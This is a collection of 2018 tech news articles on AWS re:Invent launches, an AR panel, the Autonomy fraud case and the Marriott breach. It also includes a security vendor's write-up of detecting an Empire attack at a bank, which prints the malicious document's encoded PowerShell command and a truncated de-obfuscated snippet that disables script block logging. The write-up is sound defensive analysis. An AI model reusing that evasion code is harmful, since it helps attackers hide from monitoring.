AWS launches a managed Kafka service

Kafka is an open-source tool for handling incoming streams of data. Like virtually all powerful tools, it’s somewhat hard to set up and manage. Today, Amazon’s AWS is making this all a bit easier for its users with the launch of Amazon Managed Streaming for Kafka. That’s a mouthful, but it’s essentially Kafka as a fully managed, highly available service on AWS. It’s now available on AWS as a public preview.

As AWS CTO Werner Vogels noted in his AWS re:Invent keynote, Kafka users traditionally had to do a lot of heavy lifting to set up a cluster on AWS and to ensure that it could scale and handle failures. “It’s a nightmare having to restart all the cluster and the main nodes,” he said. “This is what I would call the traditional heavy lifting that AWS is really good at solving for you.”

It’s interesting to see AWS launch this service, given that it already offers a very similar tool in Kinesis, a tool that also focuses on ingesting streaming data. There are plenty of applications on the market today that already use Kafka, and AWS is clearly interested in giving those users a pathway to either move to a managed Kafka service or to AWS in general.

As with all things AWS, the pricing is a bit complicated, but a basic Kafka instance will start at $0.21 per hour. You’re not likely to just use one instance, so for a somewhat useful setup with three brokers and a good amount of storage and some other fees, you’ll quickly pay well over $500 per month.

more AWS re:Invent 2018 coverage

AWS announces a slew of new Lambda features

AWS launched Lambda in 2015 and with it helped popularize serverless computing. You simply write code (event triggers) and AWS deals with whatever compute, memory and storage you need to make that work. Today at AWS re:Invent in Las Vegas, the company announced several new features to make it more developer friendly, while acknowledging that even while serverless reduced complexity, it still requires more sophisticated tools as it matures.

It’s called serverless because you don’t have to worry about the underlying servers. The cloud vendors take care of all that for you, serving whatever resources you need to run your event and no more. It means you no longer have to worry about coding for all your infrastructure and you only pay for the computing you need at any given moment to make the application work.

The way AWS works is that it tends to release something, then builds more functionality on top of a base service as it sees increasing requirements as customers use it. As Amazon CTO Werner Vogels pointed out in his keynote on Thursday, developers debate about tools and everyone has their own idea of what tools they bring to the task every day.

For starters, they decided to please the language folks introducing support for new languages. Those developers who use Ruby can now use Ruby Support for AWS Lambda. “Now it’s possible to write Lambda functions as idiomatic Ruby code, and run them on AWS. The AWS SDK for Ruby is included in the Lambda execution environment by default,” Chris Munns from AWS wrote in a blog post introducing the new language support.

If C++ is your thing, AWS announced C++ Lambda Runtime. If neither of those match your programming language tastes, AWS opened it up for just about any language with the new Lambda Runtime API, which Danilo Poccia from AWS described in a blog post as “a simple interface to use any programming language, or a specific language version, for developing your functions.”

For folks who have different tastes in IDEs (integrated development environments), AWS announced Lambda support for several popular ones including PyCharm and IntelliJ in preview and Visual Studio.

AWS didn’t want to stop with languages though. They also recognize that even though Lambda (and serverless in general) is designed to remove a level of complexity for developers, that doesn’t mean that all serverless applications consist of simple event triggers. As developers build more sophisticated serverless apps, they have to bring in system components and compose multiple pieces together, as Vogels explained in his keynote today.

To address this requirement, the company introduced Lambda Layers, which they describe as “a way to centrally manage code and data that is shared across multiple functions.” This could be custom code used by multiple functions or a way to share code used to simplify business logic.

They also announced the Step Functions Service Integration, which allows developers to define a set of steps and triggers, which can connect to other Amazon services such as Sagemaker, DynamoDB and Fargate. This could enable developers to build much more complex serverless applications that not only perform an action, but trigger other Amazon services.

As Lambda matures, developer requirements grow; these announcements and others are part of trying to meet those needs.

more AWS re:Invent 2018 coverage

New AWS tool helps customers understand best cloud practices

Since 2015, AWS has had a team of solution architects working with customers to make sure they are using AWS services in a way that meets best practices around a set of defined criteria. Today, the company announced a new Well Architected tool that helps customers do this themselves in an automated way without the help of a human consultant.

As Amazon CTO Werner Vogels said in his keynote address at AWS re:Invent in Las Vegas, it’s hard to scale a human team inside the company to meet the needs of thousands of customers, especially when so many want to be sure they are complying with these best practices. He indicated that they even brought on a network of certified partners to help, but it still has not been enough to meet demand.

In typical AWS fashion, they decided to create a service to help customers measure how well they are doing in terms of operations, security, reliability, cost optimization and performance efficiency. Customers can run this tool against the AWS services they are using and get a full report of how they measure up against these five factors.

“I think of it as a way to make sure that you are using the cloud right, and that you are using it well,” Jeff Barr wrote in a blog post introducing the new service.

Instead of working with a human to analyze your systems, you answer a series of questions and then generate a report based on those answers. When the process is complete you generate a pdf report with all the recommendations for your particular situation.

Image: AWS

While it’s doubtful that such an approach can be as comprehensive as a conversation between client and consultant, it is a starting point to at least get you on the road to thinking about such things, and as a free service, you have little to lose by at least trying the tool and seeing what it tells you.

more AWS re:Invent 2018 coverage

Enterprise AR is an opportunity to ‘do well by doing good,’ says General Catalyst

A founder-investor panel on augmented reality (AR) technology here at TechCrunch Disrupt Berlin suggests growth hopes for the space have regrouped around enterprise use-cases, after the VR consumer hype cycle landed with yet another flop in the proverbial ‘trough of disillusionment’.

Matt Miesnieks, CEO of mobile AR startup 6d.ai, conceded the space has generally been on another downer but argued it’s coming out of its third hype cycle now with fresh b2b opportunities on the horizon.

6d.ai investor General Catalyst‘s Niko Bonatsos was also on stage, and both suggested the challenge for AR startups is figuring out how to build for enterprises so the b2b market can carry the mixed reality torch forward.

“From my point of view the fact that Apple, Google, Microsoft, have made such big commitments to the space is very reassuring over the long term,” said Miesnieks. “Similar to the smartphone industry ten years ago we’re just gradually seeing all the different pieces come together. And as those pieces mature we’ll eventually, over the next few years, see it sort of coalesce into an iPhone moment.”

“I’m still really positive,” he continued. “I don’t think anyone should be looking for some sort of big consumer hit product yet but in verticals in enterprise, and in some of the core tech enablers, some of the tool spaces, there’s really big opportunities there.”

Investors shot the arrow over the target where consumer VR/AR is concerned because they’d underestimated how challenging the content piece is, Bonatsos suggested.

“I think what we got wrong is probably the belief that we thought more indie developers would have come into the space and that by now we would probably have, I don’t know, another ten Pokémon-type consumer massive hit applications. This is not happening yet,” he said.

“I thought we’d have a few more games because games always lead the adoption to new technology platforms. But in the enterprise this is very, very exciting.”

“For sure also it’s clear that in order to have the iPhone moment we probably need to have much better hardware capabilities,” he added, suggesting everyone is looking to the likes of Apple to drive that forward in the future. On the plus side he said current sentiment is “much, much much better than what it was a year ago”.


Discussing potential b2b applications for AR tech one idea Miesnieks suggested is for transportation platforms that want to link a rider to the location of an on-demand and/or autonomous vehicle.

Another area of opportunity he sees is working with hardware companies — to add spacial awareness to devices such as smartphones and drones to expand their capabilities.

More generally they mentioned training for technical teams, field sales and collaborative use-cases as areas with strong potential.

“There are interesting applications in pharma, oil & gas where, with the aid of the technology, you can do very detailed stuff that you couldn’t do before because… you can follow everything on your screen and you can use your hands to do whatever it is you need to be doing,” said Bonatsos. “So that’s really, really exciting.

“These are some of the applications that I’ve seen. But it’s early days. I haven’t seen a lot of products in the space. It’s more like there’s one dev shop is working with the chief innovation officer of one specific company that is much more forward thinking and they want to come up with a really early demo.

“Now we’re seeing some early stage tech startups that are trying to attack these problems. The good news is that good dollars is being invested in trying to solve some of these problems — and whoever figures out how to get dollars from the… bigger companies, these are real enterprise businesses to be built. So I’m very excited about that.”

At the same time, the panel delved into some of the complexities and social challenges facing technologists as they try to integrate blended reality into, well, the real deal.

Including raising the spectre of Black Mirror style dystopia once smartphones can recognize and track moving objects in a scene — and 6d.ai’s tech shows that’s coming.

Miesnieks showed a brief video demo of 3D technology running live on a smartphone that’s able to identify cars and people moving through the scene in real time.

“Our team were able to solve this problem probably a year ahead of where the rest of the world is at. And it’s exciting. If we showed this to anyone who really knows 3D they’d literally jump out of the chair. But… it opens up all of these potentially unintended consequences,” he said.

“We’re wrestling with what might this be used for. Sure it’s going to make Pokémon game more fun. It could also let a blind person walk down the street and have awareness of cars and people and they may not need a cane or something.

“But it could let you like tap and literally have people be removed from your field of view and so you only see the type of people that you want to look at. Which can be dystopian.”

He pointed to issues being faced by the broader technology industry now, around social impacts and areas like privacy, adding: “We’re seeing some of the social impacts of how this stuff can go wrong, even if you assume good intentions.

“These sort of breakthroughs that we’re having are definitely causing us to be aware of the responsibility we have to think a bit more deeply about how this might be used for the things we didn’t expect.”

From the investor point of view Bonatsos said his thesis for enterprise AR has to be similarly sensitive to the world around the tech.

“It’s more about can we find the domain experts, people like Matt, that are going to do well by doing good. Because there are a tonne of different parameters to think about here and have the credibility in the market to make it happen,” he suggested, noting: “It‘s much more like traditional enterprise investing.”

“This is a great opportunity to use this new technology to do well by doing good,” Bonatsos continued. “So the responsibility is here from day one to think about privacy, to think about all the fake stuff that we could empower, what do we want to do, what do we want to limit? As well as, as we’re creating this massive, augmented reality, 3D version of the world — like who is going to own it, and share all this wealth? How do we make sure that there’s going to be a whole new ecosystem that everybody can take part of it. It’s very interesting stuff to think about.”

“Even if we do exactly what we think is right, and we assume that we have good intentions, it’s a big grey area in lots of ways and we’re going to make lots of mistakes,” conceded Miesnieks, after discussing some of the steps 6d.ai has taken to try to reduce privacy risks around its technology — such as local processing coupled with anonymizing/obfuscating any data that is taken off the phone.

“When [mistakes] happen — not if, when — all that we’re going to be able to rely on is our values as a company and the trust that we’ve built with the community by saying these are our values and then actually living up to them. So people can trust us to live up to those values. And that whole domain of startups figuring out values, communicating values and looking at this sort of abstract ‘soft’ layer — I think startups as an industry have done a really bad job of that.

“Even big companies. There’d only a handful that you could say… are pretty clear on their values. But for AR and this emerging tech domain it’s going to be, ultimately, the core that people trust us.”

Bonatsos also pointed to rising political risk as a major headwind for startups in this space — noting how China’s government has decided to regulate the gaming market because of social impacts.

“That’s unbelievable. This is where we’re heading with the technology world right now. Because we’ve truly made it. We’ve become mainstream. We’re the incumbents. Anything we build has huge, huge intended and unintended consequences,” he said.

“Having a government that regulates how many games that can be built or how many games can be released — like that’s incredible. No company had to think of that before as a risk. But when people are spending so many hours and so much money on the tech products they are using every day. This is the [inevitable] next step.”

DoJ charges Autonomy founder with fraud over $11BN sale to HP

U.K. entrepreneur turned billionaire investor Mike Lynch has been charged with fraud in the U.S. over the 2011 sale of his enterprise software company.

Lynch sold Autonomy, the big data company he founded back in 1996, to computer giant HP for around $11 billion some seven years ago.

But within a year around three-quarters of the value of the business had been written off, with HP accusing Autonomy’s management of accounting misrepresentations and disclosure failures.

Lynch has always rejected the allegations, and after HP sought to sue him in U.K. courts he countersued in 2015.

Meanwhile, the U.K.’s own Serious Fraud Office dropped an investigation into the Autonomy sale in 2015 — finding “insufficient evidence for a realistic prospect of conviction.”

But now the DoJ has filed charges in a San Francisco court, accusing Lynch and other senior Autonomy executives of making false statements that inflated the value of the company.

They face 14 counts of conspiracy and fraud, according to Reuters — a charge that carries a maximum penalty of 20 years in prison.

We’ve reached out to Lynch’s fund, Invoke Capital, for comment on the latest development.

The BBC has obtained a statement from his lawyers, Chris Morvillo of Clifford Chance and Reid Weingarten of Steptoe & Johnson, which describes the indictment as “a travesty of justice,”

The statement also claims Lynch is being made a scapegoat for HP’s failures, framing the allegations as a business dispute over the application of U.K. accounting standards. 

Two years ago we interviewed Lynch onstage at TechCrunch Disrupt London and he mocked the morass of allegations still swirling around the acquisition as “spin and bullshit.”

Following the latest developments, the BBC reports that Lynch has stepped down as a scientific adviser to the U.K. government.

“Dr. Lynch has decided to resign his membership of the CST [Council for Science and Technology] with immediate effect. We appreciate the valuable contribution he has made to the CST in recent years,” a government spokesperson told it.

Marriott: Data on 500 Million Guests Stolen in 4-Year Breach

Hospitality giant Marriott today disclosed a massive data breach exposing the personal and financial information on as many as a half billion customers who made reservations at any of its Starwood properties over the past four years.

Marriott said the breach involved unauthorized access to a database containing guest information tied to reservations made at Starwood properties on or before Sept. 10, 2018, and that its ongoing investigation suggests the perpetrators had been inside the company’s networks since 2014.

Marriott said the intruders encrypted information from the hacked database (likely to avoid detection by any data-loss prevention tools when removing the stolen information from the company’s network), and that its efforts to decrypt that data set was not yet complete. But so far the hotel network believes that the encrypted data cache includes information on up to approximately 500 million guests who made a reservation at a Starwood property.

“For approximately 327 million of these guests, the information includes some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest account information, date of birth, gender, arrival and departure information, reservation date and communication preferences,” Marriott said in a statement released early Friday morning.

Marriott added that customer payment card data was protected by encryption technology, but that the company couldn’t rule out the possibility the attackers had also made off with the encryption keys needed to decrypt the data.

The hotel chain did not say precisely when in 2014 the breach was thought to have begun, but it’s worth noting that Starwood disclosed its own breach involving more than 50 properties in November 2015, just days after being acquired by Marriott. According to Starwood’s disclosure at the time, that earlier breach stretched back at least one year — to November 2014.

Back in 2015, Starwood said the intrusion involved malicious software installed on cash registers at some of its resort restaurants, gift shops and other payment systems that were not part of the its guest reservations or membership systems.

However, this would hardly be the first time a breach at a major hotel chain ballooned from one limited to restaurants and gift shops into a full-blown intrusion involving guest reservation data. In Dec. 2016, KrebsOnSecurity broke the news that banks were detecting a pattern of fraudulent transactions on credit cards that had one thing in common: They’d all been used during a short window of time at InterContinental Hotels Group (IHG) properties, including Holiday Inns and other popular chains across the United States.

It took IHG more than a month to confirm that finding, but the company said in a statement at the time it believed the intrusion was limited to malware installed at point of sale systems at restaurants and bars of 12 IHG-managed properties between August and December 2016.

In April 2017, IHG acknowledged that its investigation showed cash registers at more than 1,000 of its properties were compromised with malicious software designed to siphon customer debit and credit card data — including those used at front desks in certain IHG properties.

Marriott says its own network does not appear to have been affected by this four-year data breach, and that the investigation only identified unauthorized access to the separate Starwood network.

Starwood hotel brands include W Hotels, St. Regis, Sheraton Hotels & Resorts, Westin Hotels & Resorts, Element Hotels, Aloft Hotels, The Luxury Collection, Tribute Portfolio, Le Méridien Hotels & Resorts, Four Points by Sheraton and Design Hotels that participate in the Starwood Preferred Guest (SPG) program.

Marriott is offering affected guests in the United States, Canada and the United Kingdom a free year’s worth of service from WebWatcher, one of several companies that advertise the ability to monitor the cybercrime underground for signs that the customer’s personal information is being traded or sold.

The breach announced today is just the latest in a long string of intrusions involving credit card data stolen from major hotel chains over the past four years — with many chains experiencing multiple breaches. In October 2017, Hyatt Hotels suffered its second card breach in as many years. In July 2017, the Trump Hotel Collection was hit by its third card breach in two years.

In Sept. 2016, Kimpton Hotels acknowledged a breach first disclosed by KrebsOnSecurity. Other breaches first disclosed by KrebsOnSecurity include two separate incidents at White Lodging hotels; a 2015 incident involving card-stealing malware at Mandarin Oriental properites; and a 2015 breach affecting Hilton Hotel properties across the United States.

This is a developing story, and will be updated with analysis soon.

How We Detected a Real Empire Exploit Attack

Introduction

The article discusses an attack that took place during a POC of SentinelOne solution and the Vigilance service for a potential banking customer. The potential customer that since then became a customer, simulated attacks targeting endpoints which were protected by the SentinelOne Agent. Although this was a noisy environment with various attack vectors, the service was able to distinguish a real attack from the simulated ones, and mitigate it.

This case highlights the importance of a professional security team that is sensitive enough to spot anomalous and suspicious events, not only during routine monitoring but especially during sensitive periods such as POCs, onboarding, post-breach exploration, penetration testing and so forth.

Flow of Events

We were invited for a POC at a large banking customer. A few days into the POC, the Vigilance team noticed multiple threats on the same machine in a very short period of time, including typical threats that are used in penetration testing. For example:

  • Eicar sample
  • CQHashDumpv2 (password dumping tool)
  • NetCat installation

The team then shared this information with the customer. They were told that these events were part of approved tests on this machine.

About a week later the SentinelOne Agent triggered alerts for a Firefox exploit.

Here is the attack storyline as presented on SentinelOne console:

 Attack storyline as seen on SentinelOne Console

Figure 1: Attack Storyline as Seen on SentinelOne Console

The attack story tells us what really happened on this machine. For example, it displays running processes and the relationships between them, commands they ran etc.

The team started to investigate the threat and found these interesting points:

1)  The attack was initiated by a malicious Word Document downloaded from the Firefox browser, probably after receiving it via email. The document uses a macro to open a PowerShell console and run a known Empire code.

The Agent detected the exploit, as can be seen in Figure 2.

Figure 2: Detection of Firefox Exploit

Figure 2: Detection of Firefox Exploit

Referring to VirusTotal records, the team was able to determine that the file was new.

It was first submitted to VirusTotal at 2018-10-24 09:17:01 UTC, only two hours before it was opened on the customer’s machine.

Figure 3: Detection History of the Threat File in VT

Figure 3: Detection History of the Threat File in VT

2) At the time when the threat was detected, only 12 engines out of 57 in VT recognized that this document was malicious, among them SentinelOne Static AI engine. This AI-based engine is completely signature-less, thus it doesn’t require frequent updates.

Figure 4: 12 Engines out of 57 Detected the File as Malicious in VT

Figure 4: 12 Engines out of 57 Detected the File as Malicious in VT

3) When the team investigated the attack story, they spotted an Obfuscated Base64 code that was loaded into PowerShell.

Figure 5: Obfuscated Base64 Code

Figure 5: Obfuscated Base64 Code

Here is the the obfuscated code :

-W 1 -C [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('c3RvcC1wcm9jZXNzIC1uYW1lIHJlZ3N2cjMyIC1Gb3JjZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ=='))|iex; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('SWYoJHtQYFNgVmVyc2BJb05UQWJsZX0uUFNWZXJzaW9OLk1hSk9yIC1nZSAzKXske2dgUGZ9PVtSRWZdLkFTU2VNYmx5LkdFVFRZUEUoKCdTeXN0ZW0uJysnTWFuYWdlJysnbWUnKydudCcrJy5BJysndXRvbWF0aW9uLlUnKyd0aWxzJykpLiJHZVRGSWVgTGQiKCgnY2FjaGVkRycrJ3JvJysndXAnKydQb2xpYycrJ3lTZXR0aW4nKydncycpLCdOJysoJ29uUHUnKydibGljLCcrJ1N0YXQnKydpYycpKTtJZigke2dgcEZ9KXske0dgUGN9PSR7R2BwZn0uR2V0VkFMVWUoJHtOdWBMbH0pO0lmKCR7Z2BwY31bKCdTJysnY3InKydpcHRCJykrKCdsbycrJ2NrTG8nKydnZ2knKyduZycpXSl7JHtHYFBDfVsoJ1NjcmlwdCcrJ0InKSsoJ2wnKydvY2tMb2dnaScrJ25nJyldWygnRW5hJysnYicrJ2xlJysnU2MnKydyaXB0QicpKygnbG8nKydja0wnKydvZ2cnKydpbmcnKV09MDske2dgUEN9WygnU2NyaScrJ3AnKyd0QicpKygnbG9jaycrJ0xvZ2dpJysnbicrJ2cnKV1bKCdFbmEnKydiJysnbGVTYycrJ3JpJysncHRCJysnbG9ja0ludm9jYXRpb25Mb2cnKydnaScrJ25nJyldPTB9JHtWYEFsfT1bQ29sbGVDdGlvTnMuR2VOZVJ

The team then de-obfuscated the Base64 code in two phases:

Semi-obfuscated code:

If(${P`S`Vers`IoNTAble}.PSVersioN.MaJOr -ge 3){${g`Pf}=[REf].ASSeMbly.GETTYPE(('System.'+'Manage'+'me'+'nt'+'.A'+'utomation.U'+'tils'))."GeTFIe`Ld"(('cachedG'+'ro'+'up'+'Polic'+'ySettin'+'gs'),'N'+('onPu'+'blic,'+'Stat'+'ic'));If(${g`pF}){${G`Pc}=${G`pf}.GetVALUe(${Nu`Ll});If(${g`pc}[('S'+'cr'+'iptB')+('lo'+'ckLo'+'ggi'+'ng')]){${G`PC}[('Script'+'B')+('l'+'ockLoggi'+'ng')][('Ena'+'b'+'le'+'Sc'+'riptB')+('lo'+'ckL'+'ogg'+'ing')]=0;${g`PC}[('Scri'+'p'+'tB')+('lock'+'Loggi'+'n'+'g')][('Ena'+'b'+'leSc'+'ri'+'ptB'+'lockInvocationLog'+'gi'+'ng')]=0}${V`Al}=[ColleCtioNs.GeNeR

De-obfuscated code:

If(${PSVersIoNTAble}.PSVersioN.MaJOr -ge

3){${gPf}=[REf].ASSeMbly.GETTYPE(('System.Management.Automation.Utils'))."GeTFIeLd"(('cachedGroupPolicySe

ttings'),'N'+('onPublic,Static'));If(${gpF}){${GPc}=${Gpf}.GetVALUe(${NuLl});If(${gpc}[('ScriptB')+('lockLogging')]){${G

PC}[('ScriptB')+('lockLogging')][('EnableScriptB')+('lockLogging')]=0;${gPC}[('ScriptB')+('lockLogging')][('EnableScript

BlockInvocationLogging')]=0}${V`Al}=[ColleCtioNs.GeNeR

The code turned out to be a popular Empire code that was stored in Github:

https://github.com/EmpireProject/Empire/blob/master/lib/listeners/http_hop.py

Knowing that the challenge was solved, the team kept looking for additional indicators.

5)    A suspicious file was loaded into certutil process:

temp.txt hvKqcJJPFnm7.txt

The team suspected this file since it had a non-typical name for a text file – “.txt” as part of the file name and randomized letters.

Figure 6: Suspicious File Loaded into certutil Process

Figure 6: Suspicious File Loaded into certutil Process

6)    The team suspected a BAT file that was loaded into cmd:

DeviceHarddiskVolume2UsersFIM2AppDataRoaming66tGuhDsc2K9N.bat

It raised suspicions due to the file location and name: a long randomized name, and AppDataRoaming folder.

Figure 7: Suspicious BAT File

Figure 7: Suspicious BAT File

Vigilance Team Response

Once verified as a real threat, the team responded with mitigation actions in real time, regardless of the fact that the customer was performing penetration testing.

SentinelOne solution offers different mitigation actions, such as killing the malicious process, quarantining the files related to the threat, removing any changes to the system made by the malware, and even rolling back the machine to the previously known state before the infection.

In this case, the customer chose to roll back the machine after the team provided all the relevant data. It was accomplished by using SentinelOne agent rollback mechanism.

The team also gave the customer all available forensic data and context, making sure any similar malware will be mitigated in all SentinelOne protected machines.

This use case emphasizes the importance of professional SOC team in identifying zero-day threats and tracking them. While the product itself is autonomous, there is importance in providing context, further analysis, and recommendations for further actions.

Conclusion

The SentinelOne Vigilance team homed in on suspicious events. Armed with their expertise and SentinelOne data, they shared the information with the customer. Everyone agreed: The Vigilance team made a significant contribution to the exposure of a real attack attempt.

For a banking customer, such an attack could cause severe consequences that would translate to high financial costs and reputation damage. The fact that the attack was carried out during a POC could have made it go below the radar. Here the expertise and experience of a good SOC team in conjunction with a successful next-gen endpoint protection solution made the difference.

What is Vigilance?

Vigilance is SentinelOne’s Managed Detection and Response (MDR) service, provided by a group of highly trained cyber-security analysts. It empowers IT/SOC teams by accelerating the detection of, prioritization, and response to advanced cyber threats, thus reducing the risk of missing a critical alert that needs attention. The Vigilance analysts assess all alerts, review raw threat data, process operations, and network connections, and analyze samples, as needed. Quite often the group investigates interesting cases, and one of them is the subject of this article.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Windows Security

 

AWS launches new time series database

AWS announced a new time series database today at AWS re:Invent in Las Vegas. The new product called Amazon Timestream is a fully managed database designed to track items over time, which can be particularly useful for Internet of Things scenarios.

“With time series data, each data point consists of a timestamp and one or more attributes and it really measures how things change over time and helps drive real time decisions,” AWS CEO Andy Jassy explained.

He sees a problem though with existing open source and commercial solutions, which he says don’t scale well and are hard to manage. This is of course a problem that a cloud service like AWS often helps solve.

Not surprising as their customers were looking for a good time series database solution, AWS decided to create one themselves. Jassy said that they built Amazon Timestream from the ground up with an architecture that organizes data by time intervals and enables time series specific data compression, which leads to less scanning and faster performance.

“Timestream automates rollups, retention, tiering and compression, so time-series data can be efficiently stored and processed. Timestream’s query engine adapts to the location and format of data making it easier and faster to query time-series data,” AWS’s Jeff Barr wrote in a blog post summarizing several new announcements including Timestream.

AWS claims Timestream will be a thousand times faster at a tenth of cost of a relational database, and of course it scales up and down as required and includes all of the analytics capabilities you need to understand all of the data you are tracking.

more AWS re:Invent 2018 coverage

AWS announces new Inferentia machine learning chip

AWS is not content to cede any part of any market to any company. When it comes to machine learning chips, names like Nvidia or Google come to mind, but today at AWS re:Invent in Las Vegas, the company announced a new dedicated machine learning chip of its own called Inferentia.

“Inferentia will be a very high-throughput, low-latency, sustained-performance very cost-effective processor,” AWS CEO Andy Jassy explained during the announcement.

Holger Mueller, an analyst with Constellation Research, says that while Amazon is far behind, this is a good step for them as companies try to differentiate their machine learning approaches in the future.

“The speed and cost of running machine learning operations — ideally in deep learning — are a competitive differentiator for enterprises. Speed advantages will make or break success of enterprises (and nations when you think of warfare). That speed can only be achieved with custom hardware, and Inferentia is AWS’s first step to get in to this game,” Mueller told TechCrunch. As he pointed out, Google has a 2-3 year head start with its TPU infrastructure.

Inferentia supports popular frameworks like INT8, FP16 and mixed precision. What’s more, it supports multiple machine learning frameworks, including TensorFlow, Caffe2 and ONNX.

Of course, being an Amazon product, it also supports data from popular AWS products such as EC2, SageMaker and the new Elastic Inference Engine announced today.

While the chip was announced today, AWS CEO Andy Jassy indicated it won’t actually be available until next year.

more AWS re:Invent 2018 coverage

Amazon Textract brings intelligence to OCR

One of the challenges just about every business faces is converting forms to a useful digital format. This has typically involved using human data entry clerks to enter the data into the computer. State of the art involved using OCR to read forms automatically, but AWS CEO Andy Jassy explained that OCR is basically just a dumb text reader. It doesn’t recognize text types. Amazon wanted to change that and today it announced Amazon Textract, an intelligent OCR tool to move data from forms to a more useable digital format.

In an example, he showed a form with tables. Regular OCR didn’t recognize the table and interpreted it as a string of text. Textract is designed to recognize common page elements like a table and pull the data in a sensible way.

Jassy said that forms also often change, and if you are using a template as a workaround for OCR’s lack of intelligence, the template breaks if you move anything. To fix that, Textract is smart enough to understand common data types like Social Security numbers, dates of birth and addresses, and interprets them correctly no matter where they fall on the page.

“We have taught Textract to recognize this set of characters is a date of birth and this is a Social Security number. If forms change, Textract won’t miss it,” Jassy explained.

more AWS re:Invent 2018 coverage